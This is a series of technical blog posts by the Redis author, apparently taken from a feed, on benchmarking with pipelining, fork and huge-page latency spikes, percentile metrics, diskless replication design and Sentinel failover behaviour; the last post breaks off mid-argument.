Let’s see, with the Redis INFO command, how the system is using the CPU during this benchmark:

127.0.0.1:6379> info cpu
# CPU
used_cpu_sys:181.78
used_cpu_user:205.05
used_cpu_sys_children:0.12
used_cpu_user_children:0.87

… after 10 seconds of test …

127.0.0.1:6379> info cpu
# CPU
used_cpu_sys:184.52
used_cpu_user:206.42
used_cpu_sys_children:0.12
used_cpu_user_children:0.87

Redis spent ~3 seconds of system time, and only ~1.5 seconds in user space. What happens here is that, for each request, the biggest part of the work is performing the read() and write() calls. Also, since it is a one-query one-reply workload for each client, we pay a full RTT for each request of each client.

Now let’s check what happens if I use pipelining instead, a well-known feature heavily exploited by Redis users, since it is the only way to maximize server usage, and there are usually a number of places in the application where you can perform multiple operations at a time.

With a pipeline of 32 operations the numbers change drastically. My tiny instance was able to deliver 250k ops/sec using a single core, which is 25% of the *top* result obtained with 32 (each faster) cores in the mentioned benchmark.
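Enabling pipelining is just a matter of adding the -P option to the invocation above (again, an approximation of my exact command line):

./redis-benchmark -h <master-ip> -P 32 -t set,get -d 100 -r 10000000 -n 10000000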

Let’s look at the CPU time:

127.0.0.1:6379> info cpu
# CPU
used_cpu_sys:189.16
used_cpu_user:216.46
used_cpu_sys_children:0.12
used_cpu_user_children:0.87

… after 10 seconds of test …

127.0.0.1:6379> info cpu
# CPU
used_cpu_sys:190.60
used_cpu_user:224.92
used_cpu_sys_children:0.12
used_cpu_user_children:0.87

This time we are actually using the database engine to serve queries with our CPU; we are no longer losing most of the time in context switches. We used ~1.5 seconds of system time, and 8.46 seconds of user time inside the Redis process itself.

Using lower pipeline values gets us results in the middle: a pipeline of 4 = 100k ops/sec (which should translate to ~400k ops/sec on the bigger instance used in the benchmark), a pipeline of 8 = 180k ops/sec, and so forth.

So basically it is not a coincidence that benchmarking Redis and AerospikeDB in this way produces remarkably similar results. More or less you are not testing the databases, but the network stack and the kernel. If the DB can serve queries using a read and a write system call without any other huge waste, this is what we get, and here the time to serve the actual query is small, since we are talking about data fitting into memory (just a note: 10M keys of 100 bytes in Redis will use a fraction of the memory that was allocated in those instances).

However there is more to it. What about the operations we can perform? Testing Redis doing GET/SET is like testing a Ferrari by checking how well it cleans the mirror when it rains.

A fundamental part of the Redis architecture is that largely different operations have similar costs, so what about our huge Facebook game posting scores of the finished games to create the leaderboard?

The same single process can do 110k ops/sec when the query is: ZADD myscores …

But let’s demand more: what about estimating cardinality with the HyperLogLog, adding new elements and reading the current estimate at the same time, with two redis-benchmark processes? The set size is 10 million again. During this test I spawned one benchmark executing PFADD with random elements of the set, and another doing PFCOUNT at the same time on the same HyperLogLog. Both scored simultaneously at 250k ops/sec, for a total of half a million ops per second with a single Redis process.
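Something along these lines models the test, with the two benchmarks running in parallel (redis-benchmark expands __rand_int__ into a random number within the -r range; the key name and exact flags are my assumptions):

./redis-benchmark -r 10000000 -n 10000000 PFADD myhll ele:__rand_int__
./redis-benchmark -n 10000000 PFCOUNT myhll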

In Redis, doing complex operations is similar to pipelining: you want to do *more* for each read/write, otherwise your performance is dominated by I/O.

Ok, so a few useful remarks:

1) GET/SET benchmarks are not a great way to compare different database systems.
2) A better performance comparison is by use case: for a given specific use case, using different data models, schemas, queries and strategies, how many instances do I need to handle the same traffic for the same app with two different database systems?
3) Test with the instance types most people are actually going to use: huge instance types can mask inefficiencies of certain database systems, and are anyway not what most people are going to run.

We’ll continue to optimize Redis for speed, and will continue to avoid posting comparative benchmarks.

[Thanks to Amazon AWS for providing me free access to EC2]
http://antirez.com/news/85
Redis latency spikes and the Linux kernel: a few more details http://antirez.com/news/84 http://antirez.com/news/84 Mon, 03 Nov 2014 15:58:19 +0000
The test was performed with 1GB of data in memory, with 150k writes per second originating from a different EC2 instance, targeting 5 million keys (evenly distributed). The pipeline was set to 4 commands. This translates to the following redis-benchmark command line:

./redis-benchmark -P 4 -t set -r 5000000 -n 1000000000

Every time BGSAVE was triggered, I could see ~300 millisecond latency spikes of unknown origin, since fork itself was taking only 6 milliseconds. Fortunately Redis has a software watchdog feature that is able to produce a stack trace of the process during a latency event. It is quite a simple trick but it works great: we set up a SIGALRM to be delivered by the kernel. Each time the serverCron() function is called, the scheduled signal is cleared, so Redis actually never receives it if control returns fast enough to the Redis process. If instead there is a blocking condition, the signal is delivered by the kernel, and the signal handler prints the stack trace.
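The trick is easy to sketch outside of Redis. Here is a minimal Python rendition of the idea (Redis implements it in C inside serverCron(); the period here is arbitrary):

import signal, time, traceback

def watchdog(signum, frame):
    # fires only if a loop iteration blocked past the watchdog period
    print("Blocked! Stack trace at the time of the stall:")
    traceback.print_stack(frame)

signal.signal(signal.SIGALRM, watchdog)

while True:
    # re-arming the timer each iteration "clears" the previously scheduled signal
    signal.setitimer(signal.ITIMER_REAL, 0.5)
    time.sleep(0.1)  # stand-in for one event loop iteration; make it > 0.5s to see the handler fire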

Instead of getting stack traces involving the fork call, the process was always blocked near MOV* operations happening in the context of the parent process just after the fork. I started to develop the theory that Linux was “lazy forking” in some way, and that the actual heavy stuff was happening later, when memory was accessed and pages had to be copy-on-write-ed.

The next step was to read the fork() implementation of the Linux kernel. What the system call does is indeed copy all the mapped regions (vm_area_struct structures). A traditional implementation would also duplicate the PTEs at this point, inside copy_page_range(). However something changed years ago, as an optimization: Linux does not just perform lazy page copying, as most modern kernels do; the PTEs themselves are also copied in a lazy way, on faults. Here is the top comment of copy_page_range():

* Don't copy ptes where a page fault will fill them correctly.
* Fork becomes much lighter when there are big shared or private
* readonly mappings. The tradeoff is that copy_page_range is more
* efficient than faulting.

Basically, as soon as the parent process performs an access in the regions shared with the child process, during the page fault Linux does the big amount of work skipped by fork, and this is why I could always see a MOV instruction in the stack trace.

While this behavior is not good for Redis, for which copying all the PTEs in a single operation is more efficient, it is much better for the traditional use case of fork() on POSIX systems, which is fork()+exec*() in order to spawn a new process.

This issue is not EC2 specific, however virtualized instances are slower at copying PTEs, so the problem is less noticeable with physical servers.
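A toy experiment makes the “fork is cheap, faults pay later” effect visible (this is my illustration, not the actual test from this post; numbers vary wildly between machines and kernel settings):

import os, time

buf = bytearray(512 * 1024 * 1024)   # ~512MB of anonymous memory

start = time.time()
pid = os.fork()
fork_ms = (time.time() - start) * 1000
if pid == 0:
    time.sleep(2)                    # keep the child alive so the pages stay shared
    os._exit(0)

print("fork() took %.2f ms" % fork_ms)
start = time.time()
for i in range(0, len(buf), 4096):   # dirty one byte per 4k page in the parent
    buf[i] = 1
print("touching every page took %.2f ms" % ((time.time() - start) * 1000))
os.waitpid(pid, 0)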

However this is definitely not the full story. While I was testing this stuff on my Linux box, I remembered that, using the libc malloc instead of jemalloc, in certain conditions I was able to measure fewer latency spikes in the past. So I tried to check if there was some relation.

Indeed, compiling with MALLOC=libc I was not able to measure any latency spike on the physical server, while with jemalloc I could observe the same behavior observed on the EC2 instance. To understand the difference better, I set up a test with 15 million keys and a larger pipeline, in order to stress the system more and make it more likely that the page faults of all the mmapped regions could happen in a very small interval of time. Then I repeated the same test with jemalloc and with libc malloc:

bare metal, 675k/sec writes to 15 million keys, jemalloc: max spike 339 milliseconds.
bare metal, 675k/sec writes to 15 million keys, malloc: max spike 21 milliseconds.

I quickly tried to replicate the same result on EC2: same story, the spike was a fraction with malloc.

The next logical step after these findings was to inspect the difference in the memory layout of a Redis system running with libc malloc versus one running with jemalloc. The Linux proc filesystem is handy to investigate the process internals (in this case I used the /proc/<pid>/smaps file).
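For example, assuming a single redis-server process is running:

cat /proc/$(pidof redis-server)/smaps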

Jemalloc memory is allocated in this region:

7f8002c00000-7f8062400000 rw-p 00000000 00:00 0
Size: 1564672 kB
Rss: 1564672 kB
Pss: 1564672 kB
Shared_Clean: 0 kB
Shared_Dirty: 0 kB
Private_Clean: 0 kB
Private_Dirty: 1564672 kB
Referenced: 1564672 kB
Anonymous: 1564672 kB
AnonHugePages: 1564672 kB
Swap: 0 kB
KernelPageSize: 4 kB
MMUPageSize: 4 kB
Locked: 0 kB
VmFlags: rd wr mr mw me ac sd

While libc big region looks like this:

0082f000-8141c000 rw-p 00000000 00:00 0 [heap]
Size: 2109364 kB
Rss: 2109276 kB
Pss: 2109276 kB
Shared_Clean: 0 kB
Shared_Dirty: 0 kB
Private_Clean: 0 kB
Private_Dirty: 2109276 kB
Referenced: 2109276 kB
Anonymous: 2109276 kB
AnonHugePages: 0 kB
Swap: 0 kB
KernelPageSize: 4 kB
MMUPageSize: 4 kB
Locked: 0 kB
VmFlags: rd wr mr mw me ac sd

Looks like there are a couple of differences here.

1) There is [heap] in the first line only for libc malloc.
2) The AnonHugePages field is zero for libc malloc, but is set to the size of the region in the case of jemalloc.


Basically, the difference in latency appears to be due to the fact that malloc is using transparent huge pages, a kernel feature that transparently glues multiple normal 4k pages into a few huge pages of 2048k each. This in turn means that copying the PTEs for these regions is much faster.


EDIT: Unfortunately I just spotted that I am totally wrong: the huge pages are apparently only used by jemalloc. I simply misread the outputs, since this explanation seemed so obvious. So, on the contrary, it appears that the high latency is due to the huge pages thing for some unknown reason, and it is malloc that, while NOT using huge pages, is going much faster. I have no idea about what is happening here, so please disregard the above conclusions.


Meanwhile, for low latency applications you may want to build Redis with “make MALLOC=libc”; however make sure to run “make distclean” first, and be aware that, depending on the workload, libc malloc suffers fragmentation more than jemalloc.


More news soon…

EDIT2: Oh wait... since the problem is huge pages, this is MUCH better, since we can disable them. And I just verified that it works:

echo never > /sys/kernel/mm/transparent_hugepage/enabled

This is the new Redis mantra apparently.
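To verify that the setting took effect, you can read the same file back; the active policy is shown in brackets (output shown for illustration):

cat /sys/kernel/mm/transparent_hugepage/enabled
always madvise [never]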

UPDATE: While this seemed unrealistic to me, I experimentally verified that the huge pages latency spike is due to the fact that, with 50 clients writing at the same time, each with N queued requests, the Redis process can touch all the process pages in the space of *a single event loop iteration*, so it ends up copy-on-writing the entire process address space. This means that huge pages are not only horrible for latency, but also horrible for memory usage.
http://antirez.com/news/84
Redis latency spikes and the 99th percentile http://antirez.com/news/83 http://antirez.com/news/83 Thu, 30 Oct 2014 13:28:42 +0000
img://antirez.com/misc/stripe-latency.png

As you can guess, if you perform a latency test during the fork, all the requests crossing the moment the parent process forks will be delayed up to one second (taking the graph above as an example; I am not sure what the process size or the EC2 instance type was). This will produce a number of samples with high latency, and will affect the 99th percentile result.

Changing instance type, configuration, setup, or whatever else in order to improve this behavior is a good idea, and there are use cases where even a single request with too high a latency is unacceptable. However apparently it is not obvious how latency spikes of 1 second every 30 minutes (or more, if you use AOF with the right rewrite triggers) are very different from latency spikes which are evenly distributed in the set of requests.

With evenly distributed spikes, if the generation of a page needs to perform a number of requests to a Redis server in order to create the output, it is very likely that a page view will incur the latency penalty: this potentially impacts the quality of service in a great way; check this link: http://latencytipoftheday.blogspot.it/2014/06/latencytipoftheday-most-page-loads.html.

However 1 second of latency every 30 minutes of run time is a completely different thing. For one, the percentile with good latency gets better *as the number of requests increases*, since the more requests there are, the less likely this second of latency is to be over-represented in the samples (if you have just 1 request per minute, and one of those requests happens to hit the high latency, it will affect the 99.99th percentile much more than what happens with 100 requests per second).

Second: most page views will be unaffected. The only users that will see the 1 second delay are the ones making a request crossing the fork call. All the other requests have an extremely low probability of hitting a latency which is significantly worse than the average. Also note that a page view crossing the fork time, even when composed of 100 requests, cannot be delayed for more than a second, since the requests complete as soon as the fork() call terminates.

The bottom line here is that, if there are hard latency requirements for each single request, a setup where a request can be delayed 1 second from time to time is clearly a big problem. However when the goal is to provide a good quality of service, the distribution of the latency spikes has a huge effect on the outcome. Redis latency spikes due to fork on Xen are isolated points on the time line, so they affect a percentage of page views, even when the page views are composed of a big number of Redis requests, which is proportional to the latency spike total time percentage: 1 second every 1800 seconds in this case, so only 0.05% of the page views will be affected.
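The arithmetic behind that figure is trivial (a sketch):

spike_seconds = 1.0      # duration of the fork-induced spike
period_seconds = 1800.0  # one fork every 30 minutes
print(spike_seconds / period_seconds)  # 0.000555..., i.e. roughly 0.05% of page views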

Latency characteristics are hard to capture with a single metric: the full percentile curve and the distribution of the spikes can provide a better picture. In general, good rules of thumb are a good way to start an investigation, and it is true that the average latency is a poor metric. However promoting a rule of thumb into an absolute truth has its disadvantages too, since many complex things remain complex, and in need of close inspection, regardless of our willingness to over-simplify them.

At the same time, fork delays in EC2 instances are one of the worst experiences for Redis users in one of the most popular runtime environments today, so I am starting to test Redis on EC2 regularly now: we will soon have EC2-specific optimization pages in the official Redis documentation, and a safer way to operate master-slave replicas with persistence disabled.

If you need EC2 + a Redis master with persistence disabled now, the simplest “quick fix” to deploy is to disable automatic restarts of Redis instances, and use Sentinel for failover, so that crashed masters will not automatically become available again, and will be failed over by Sentinel. The system administrator can restart the master manually after checking that the failover was successful and there is a new active master.

EDIT: Make sure to check the Hacker News thread that contains interesting information about EC2, Xen and fork time: https://news.ycombinator.com/item?id=8532851. Also not all the EC2 instances are the same, and certain types provide great fork times, on par with bare metal systems: https://redislabs.com/blog/testing-fork-time-on-awsxen-infrastructure#.VFJQ-JPF8yF
http://antirez.com/news/83
This is why I can’t have conversations using Twitter http://antirez.com/news/82 http://antirez.com/news/82 Wed, 29 Oct 2014 09:17:04 +0000
In the same post Stripe engineers said that they are going to switch to PostgreSQL for the use case where they have issues with Redis. PostgreSQL is a great database indeed, and many times, if you can go with the SQL data model and an on-disk database, it is better to use that instead of Redis, which is designed for when you really want to scale to a lot of complex operations per second. Stripe engineers also said that they measured the 99th percentile and it was better with PostgreSQL compared to Redis, so in a tweet @aphyr wrote:

“Note that *synchronous* Postgres replication *between AZs* delivers lower 99th latencies than asynchronous Redis”

And I replied:

“It could be useful to look at average latency to better understand what is going on, since I believe the 99% percentile is very affected by the latency spikes that Redis can have running on EC2.”

Which means: if you also have the average, you can tell whether the 99th percentile is ruined (or not) by latency spikes, which many times can be solved. Usually it is as simple as that: if you have a very low average but a bad 99th percentile, likely it is not that Redis is running slow because, for example, the operations performed are very time consuming or blocking, but rather that a subset of queries are served slowly because of the usual issues in EC2: fork time on certain instance types, remote disk I/O, and so forth. Stuff that you can likely address, since, for example, there are instance types without the fork latency issue.

For half of the Twitter IT community, my statement amounted to promoting the average latency as the right metric over 99th percentiles:

"averages are the worst possible metric for latency. No latency I've ever seen falls on a bell curve. Averages give nonsense."

"You have clearly not understood how the math works or why tail latencies matter in dist sys. I think we're done here."

“indeed; the problem is that averages are not robust in the presence of outliers”

Ehm, who said that the average is a good metric? I proposed it to *detect* whether or not there are big outliers. So, during what was supposed to be a normal exchange, after 10 minutes I find my Twitter completely full of people telling me that I’m an idiot for endorsing averages as The New Metric For Latency in the world. Once you get the first retweets, you get more and more. Even a notable builder of another NoSQL database found the time to lecture me a few things via Twitter: I replied saying that clearly what I wrote was that if you have the 99th percentile + avg you have a better picture of the curve and can understand if the problem is the Redis spikes on EC2, but magically the original tweet got removed, so my tweets are now even more out of context. My three tweets:

1. “may point was, even if in the internet noise I'm not sure if it is still useful, that avg helps to understand why (…)”
2. “the 99% percentile is bad. If avg is very good but 99% percentile is bad, you can suspect a few very bad samples”
3. “this is useful with Redis, since with proper config sometimes you can improve the bad latency samples a lot.”

Guess what? There is even somebody that isolated tweet #2, which was the continuation of “to understand why the 99% percentile is bad” (bad as in, not providing good figures), and just read it out of context: “the 99% percentile is bad”.

Once upon a time, people used to argue for days on Usenet, but at least there was, most of the time, an argument against an argument and so forth, with enough text and context to have a normal discussion. This instead is just amplification of hate and Engineering Rules 101 mixed together. 99th percentile latency is the right metric and the average is a poor one? Then make sure never to talk about averages, even in a context where it makes sense, otherwise you get 10000 shitty replies.

What to do about that? Now, a good thing about me is that I’m not much affected by all this personally, but it is also clear that, because I use Twitter as a matter of work, in order to inform people of what is happening with Redis, this is not a viable working environment. For example, latency: I care a lot about latency, so many efforts were made over the years in order to improve it (including diskless replication). We have monitoring as well, in order to understand if and why there are latency spikes: Redis can provide you a human readable report of what is happening inside of it by monitoring different execution paths. After all this work, what you get instead is the wrong message retweeted one million times, which does not help. Most people will not follow the tweets to form an idea themselves; the reality is, at this point, rewritten: I said that the average is a good metric, and I don’t realize that you should look at the long tail. Next time I talk about latency, for many people, I’ll be the one with a few unclear ideas about it, so who knows what I’m talking about or what I’m doing?

At the same time, Twitter is RSS for humans: it is extremely useful to keep many people updated about what I love to do, which is to work on my open source project, which so far I have tried to develop with care. So I’m trying to think about what a viable setup could be. Maybe I can just blog more, use the Redis mailing list more, and use Twitter just to link stuff, so that interested people can read, argue, and have real and useful discussions.

I have a lot of things to do for Redis, for the users that are having a good time with it, and a lot of things to do for the users that are experiencing problems. I feel like my time is best spent hacking instead of having non-conversations on Twitter. I love to argue, but this is just a futile exercise.
http://antirez.com/news/82
Diskless replication: a few design notes. http://antirez.com/news/81 http://antirez.com/news/81 Mon, 27 Oct 2014 16:34:15 +0000
The feature is not exactly a new idea: it was proposed several times, especially by EC2 users who know that it is sometimes not trivial for a master to provide good performance during slave synchronization. However there are a number of use cases where you don’t want to touch disks even when running on physical servers, and especially when Redis is used as a cache. Redis replication was, in short, forcing users to use the disk even when they did not need or want disk durability.

When I returned home I wanted to provide quick feedback to the developers that attended the meeting, so the first thing I did was to focus on implementing the feature that seemed the most important and non-trivial among the list of identified issues. In the next weeks the attention will move to the Redis development process as well: the way issues are handled, how new ideas can be proposed to the Redis project, and so forth. Sorry for the delay on these other important things; for now what you get is some code, at least ;-)

Diskless replication posed a few design challenges. It looks trivial but it is not, so, since I want to blog more, I thought about documenting how the internals of this feature work. I’m sure a blog post can make the understanding and adoption of the new feature simpler.

How replication used to work
===

Newer versions of Redis are able, when the connection with the master is lost, to reconnect and continue the replication process in an incremental way, just fetching the differences accumulated so far. However when a slave is disconnected for a long time, or restarted, or is a brand new slave, Redis requires it to perform what is called a “full resynchronization”.

It is a trivial concept, and it means: in order to set up this slave, let’s transfer *all* the master data set to it. The slave will flush away its old data, and reload the new data from scratch, making sure it is running an exact copy of the master’s data. Once the slave is an exact copy of the master, successive changes are streamed as normal Redis commands, in an incremental way, as the master data set itself gets modified because of write commands sent by clients.

The problem was the way this initial “bulk transfer” needed for a full resynchronization was performed. Basically, a child process was created by the master in order to generate an RDB file. When the child was done with the RDB file generation, the file was sent to the slaves, using non-blocking I/O from the parent process. Finally, when the transfer was complete, slaves could load the RDB file and go online, receiving the incremental stream of new writes.

However this means that from the master point of view, in order to perform a full sync, we need:

1) To write the RDB on disk.
2) To load back the RDB from disk in order to send it to slaves.

“2” is not great but “1” is much worse. If AOF is active at the same time, for example, the AOF fsync() can be delayed a lot by the child writing to the disk as fast as possible. With the wrong setup, especially with non-local disks, but sometimes even because of non-perfect kernel parameter tuning, the disk pressure was the cause of latency spikes that are hard to deal with. Partial resynchronizations, introduced in Redis 2.8, mitigated this problem a bit, but from time to time you have to restart your slaves, or they stay offline for too long, so it is impossible to avoid full resynchronizations.

At the same time, this process had a few advantages. The RDB saving code was reused for replication as well, making the replication code simpler. Moreover, while the child was producing the RDB file, new slaves could attach and be put in a queue: when the RDB was ready, we could feed multiple slaves at the same time.

All in all, in many setups it works great and allows synchronizing a number of slaves at the same time. Also, many users run with RDB persistence enabled on the master side, but not AOF, so persisting to disk was happening from time to time anyway. Most bare-metal users don’t see any latency at all while Redis is persisting; moreover disks, especially local disks, have easy to predict performance: once the child starts to save, you don’t really need to check for timeouts or whether it is taking too much time; it will end eventually, and usually within a reasonable amount of time.

For these reasons, disk-backed replication is *still* the default replication strategy, and there are no plans to remove it so far, but now we have an alternative in order to serve the use cases where it was not great.

So what is diskless replication? It is the idea that you can write directly from the child process to the slaves, via socket, without any intermediate step.

Sockets are not disks
===

The obvious problem with diskless replication is that writing to disks is different from writing to sockets. To start, the API is different, since the RDB code used to write to C FILE pointers, while writing to sockets is a matter of writing to file descriptors. Moreover, disk writes don’t fail, if not for hard I/O errors (for example if the disk is full), so when a write fails, you can consider the process aborted. For sockets it is different, since writes can be delayed because the receiver is slow while the local kernel buffer is full. Another interesting issue is that there are timeouts to deal with: what if the receiving side experiences a failure so that it stops reading from us? Or what if the TCP connection is dead but we don’t get resets, and so forth? We can’t keep the child sending the RDB file to the slaves alive forever; there must be a way to detect timeouts.

Fortunately, modifying the RDB code to write to file descriptors was trivial, because for an entirely different problem (MIGRATE/RESTORE for Redis Cluster) the code was already using an abstraction called “rio” (Redis I/O), which abstracts the serialization and deserialization of Redis values in RDB format, so that you can write a value to the disk, or to an in-memory buffer. What I did was to support a new “rio” target, called fdset: a set of file descriptors. This is because, as I’ll explain later, we need to write to multiple file descriptors at the same time.

However this was not enough. One of the main design tradeoffs was deciding whether the in-memory RDB transfer would happen in one of the following two ways:

1) Way #1: produce a full RDB file in memory inside a buffer, then transfer it.
2) Way #2: write directly to the slave sockets, incrementally, as the RDB is created.

Way #1 is a lot simpler, since it is basically like the on-disk writing stuff, just targeting a kind of RAM disk. However the obvious risk is using too much memory. Way #2 is a bit more risky, because you have to transfer data while the child producing the RDB file is active. However the essence of the feature was to target environments with slow disks perhaps, but *with fast networks*, without requiring too much additional memory, otherwise the feature risks being useless. So Way #2 was selected.

However if you stream an RDB file like this, there is a new problem to solve… how will the slave understand that EOF has been reached? When we start the transfer, we don’t know how big it will be. With on-disk replication, instead, the size was known, so the transfer happened using just a Redis protocol “bulk” string, with a prefixed length. Something like:

$92384923423\r\n
… data follows …

I was too lazy to implement some complex chunked protocol to announce the sizes of the incremental blocks, so I went for a more brute force approach. The master generates an unguessable and unlikely-to-collide 160 bit random string, and sends something like this to the slave:

$EOF:796f255829a040e80168f94c9fe7eda16b35e5df\r\n
… data follows …
796f255829a040e80168f94c9fe7eda16b35e5df

So basically this string, which is guaranteed (merely because of its infinitesimal collision probability) to never appear inside the file, is used as the end-of-file mark. Trivial, but it works very well, and it is simple.
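Here is a sketch, in Python, of how the receiving side of such a protocol can consume the stream (the real slave side is C code inside Redis; this just illustrates the delimiter-based framing):

import socket

def recv_until_mark(sock: socket.socket, mark: bytes) -> bytes:
    """Read the streamed payload until the EOF mark; return it without the mark."""
    data = bytearray()
    while not data.endswith(mark):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("connection closed before the EOF mark")
        data += chunk
    # a real implementation would stream to disk instead of buffering everything
    return bytes(data[:-len(mark)])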

For timeouts, since this is a blocking write process (we are in the context of the saving child process), I just used the SO_SNDTIMEO socket option. This way we are sure that we need to make progress, otherwise the replication process is aborted. For now there is no hard time limit for the child lifespan, so there are, in theory, pathological conditions where the slave could accept just one byte every timeout-1 seconds, creating a very slow transfer. Probably in the future the child will monitor the transfer rate, and if it drops below a reasonable figure, it will exit with an error.

Serving multiple slaves at the same time
===

Another goal of this implementation was the ability to serve multiple slaves at the same time. At first this looks impossible, since once the RDB transfer starts, new slaves can’t attach; they need to wait for the current child to stop and a new one to start.

However there is a very simple trick that covers a lot of use cases, which is: once the first slave wants to replicate, we wait a few seconds for others to arrive as well. This covers the obvious case of a mass resync from multiple slaves, for example.

Because of this, the I/O code was designed to write to multiple file descriptors at the same time. Moreover, in order to parallelize the transfer even though blocking I/O is used, the code tries to write a small amount of data to each fd in a loop, so that the kernel sends the packets in the background to multiple slaves at the same time.

Probably the code itself is pretty easy to understand:

while(len) {
    size_t count = len < 1024 ? len : 1024;
    int broken = 0;
    for (j = 0; j < r->io.fdset.numfds; j++) {
        … error checking removed …

        /* Make sure to write 'count' bytes to the socket regardless
         * of short writes. */
        size_t nwritten = 0;
        while(nwritten != count) {
            retval = write(r->io.fdset.fds[j],p+nwritten,count-nwritten);
            if (retval <= 0) {
                … error checking removed …
            }
            nwritten += retval;
        }
    }
    p += count;
    len -= count;
    r->io.fdset.pos += count;
    … more error checking removed …
}

Note that writes are buffered by the rio.c write target, since we want to write only when a given amount of data is available, otherwise we risk sending TCP packets with 5 bytes of data inside.

Handling partial failures
===

Handling multiple slaves is not just a matter of writing to multiple FDs, which is quite simple. A big part of the story is actually handling a few slaves failing without blocking the process for all the other slaves. File descriptors in error are marked with the related error code, and no attempt is made to write to them again. The code also detects when all the FDs are in an error state, and in that case aborts the process entirely.

However, when the RDB writing is complete, the child needs to report which slaves received the RDB and can continue the replication process. For this task, a unix pipe is used between the processes. The child returns an array of slave IDs and associated error states, so that the parent can also do a decent job of logging errors.

How this changes Redis in a deeper way than I thought
===

Diskless replication finally allows for a totally disk-free experience in Redis master-slave sets. This means we need to support this use case better. Currently replication is dangerous to run with persistence disabled, since I thought there was no case for turning off persistence when replication was going to trigger it anyway. But now this has changed… and as a result, there are already plans to better support replication in non-disk-backed environments. The same will be applied to Redis Cluster as well… which is also a good candidate for diskless operation, especially for caching use cases, where replicas can do a good job of providing data redundancy, but where it may not be too critical if the crash-restart of multiple instances causes data loss for a subset of hash slots in the cluster.

ETA
===

The code is already available in beta here: https://github.com/antirez/redis/commits/memsync
It will be merged into unstable in the next days, but the plan is to wait a bit for feedback and bug reports, and later merge it into 3.0 and 2.8 as well. The feature is very useful, and it has little interaction with the rest of the Redis core when it is turned off. The plan is to just back-port it everywhere and release it as “experimental” for some time.
http://antirez.com/news/81
A few arguments about Redis Sentinel properties and fail scenarios. http://antirez.com/news/80 http://antirez.com/news/80 Tue, 21 Oct 2014 15:18:10 +0000
“OH on Redis Sentinel "They kill -9'd the master, which caused a split brain..."
“then the old master popped up with no data and replicated the lack of data to all the other nodes. Literally had to restore from backups."

OMG, we have some nasty bug, I thought. However I tried to get more information from Kyle, and he replied that the users had actually disabled disk persistence entirely on the master process. Yep: the master was configured, on purpose, to restart with a wiped data set.

Guess what? A Twitter drama immediately started. People were deeply worried for Redis users. Poor Redis users! Always in danger.

However, while being very worried is a trait of sure wisdom, I want to take the other path: providing some more information. Moreover this blog post is interesting to write since Kyle, while reporting the problem with little context, was actually able a few tweets later to, IMHO, isolate the one aspect that I believe could be improved in Redis Sentinel, which is not related to the described incident, and has been on my TODO list for a long time now.

But first, let’s look a bit more closely at the behavior of Redis / Sentinel in the drama-incident.

Welcome to the crash recovery system model
===

Most real world distributed systems must be designed to be resilient to the fact that processes can restart at random. Note that this is very different from the problem of being partitioned away, which is, the inability to exchange messages with other processes. It is, instead, a matter of losing state.

To be more accurate about this problem, we could say that if a distributed algorithm is designed so that a process must guarantee to preserve its state after a restart, and it fails to do this, it is technically experiencing a Byzantine failure: the state is corrupted, and the process is no longer reliable.

Now, in a distributed system composed of Redis instances and Redis Sentinel instances, it is fundamental that rebooted instances are able to restart with the old data set. Starting with a wiped data set is a Byzantine failure, and Redis Sentinel is not able to recover from this problem.

But let’s take a step backward. Actually, Redis Sentinel may not be directly involved in an incident like that. The typical example is what happens if a misconfigured master restarts fast enough that no failure is detected at all by the Sentinels.

1. Node A is the master.
2. Node A is restarted, with persistence disabled.
3. Sentinels (may) see that Node A is not reachable… but not enough to reach the configured timeout.
4. Node A is available again, except it restarted with a totally empty data set.
5. All the slave nodes B, C, D, ... will happily synchronize an empty data set from it.

Everything wiped from the master, as per its configuration, after all. And everything wiped from the slaves, which are replicating from what is believed to be the current source of truth for the data set.

Let’s remove Sentinel from the equation, that is, point “3” of the above timeline, since Sentinel did not act at all in the example scenario.

This is what you get. You have a Redis master replicating to N slaves. The master is restarted, configured to start with a fresh (empty) data set. The slaves replicate again from it (an empty data set). I think this is no big news for Redis users; this is how Redis replication works: slaves will always try to be an exact copy of their masters. However, let’s consider alternative models.

For example, Redis instances could have a Node ID which is persisted in the RDB / AOF file. Every time the node restarts, it loads its Node ID. If the Node ID is wrong, slaves won’t replicate from the master at all. Much safer, right? Only marginally, actually. The master could have a different misconfiguration, so after a restart it could reload a data set which is weeks old, because snapshotting failed for some reason. So after a bad restart we would still have the right Node ID, but a data set so old as to be basically the same as a wiped one, just more subtle to detect.

However, at the cost of making things only marginally more secure, we would now have a system that may be more complex to operate, and slaves that are in danger of not replicating from the master because the ID does not match, due to operational errors similar to disabling persistence, except a lot less obvious.

So, let’s change topic, and see a failure mode where Sentinel is *actually* involved, and that can be improved.

Not all replicas are the same
===

Technically Redis Sentinel offers a very limited set of simple to understand guarantees.

1) All the Sentinels will agree about the configuration as soon as they can communicate. Actually each sub-partition will always agree.
2) Sentinels can’t start a failover without an authorization from the majority of Sentinel processes.
3) Failovers are strictly ordered: if a failover happened later in time, it has a greater configuration “number” (config epoch in Sentinel slang), that will always win over older configurations.
4) Eventually the Redis instances are configured to map with the winning logical configuration (the one with the greater config epoch).

This means that the dataset semantics is “last failover wins”. However, the missing information here is: during a failover, which slave is picked to replace the master? This is, all in all, a fundamental property. For example, if Redis Sentinel fails by picking a wiped slave (one that just restarted with a wrong configuration), *that* is a problem with Sentinel. Sentinel should make sure that, even within the limits of Redis being an asynchronously replicated system, it acts in the best interest of the user by picking the best slave around, and refusing to failover at all if there is no viable slave reachable.

This is a place where improvements are possible. This is what happens today in order to select a slave when the master is failing:

1) If a slave was restarted, and never connected with the master after the restart, performing a successful synchronization (data transfer), it is skipped.
2) If the slave has been disconnected from its master for more than 10 times the configured timeout (the time a master should be unreachable for the set of Sentinels to detect it as failing), it is considered non-eligible.
3) Out of the remaining slaves, Sentinel picks the one with the best “replication offset”.

The replication offset is a number that Redis master-slave replication uses to count the amount of bytes sent via the replication channel. It is useful in many ways, not just for failovers. For example, in partial resynchronizations after a net split, slaves ask the master: give me data starting from offset X, which is the last byte I received. And so forth.

However this replication offset has two issues when used in the context of picking the best slave to promote.

1) It is reset after restarts. This sounds harmless at first, since we want to pick the slaves with the highest offset and, anyway, after a restart, if a slave can’t connect, it is skipped. However it is not harmless at all; read on.
2) It is just a number: it does not imply that a Redis slave replicated from *a given* master.

Also note that when a slave is promoted to master, it inherits the master’s replication offset. So modulo restarts, the number keeps increasing.

Why are “1” and/or “2” suboptimal choices, and how can they be improved?

Imagine this setup. We have nodes A B C D E.
D is the current master, and is partitioned away with E in a minority partition. E still replicates from D, everything is fine from their POV.

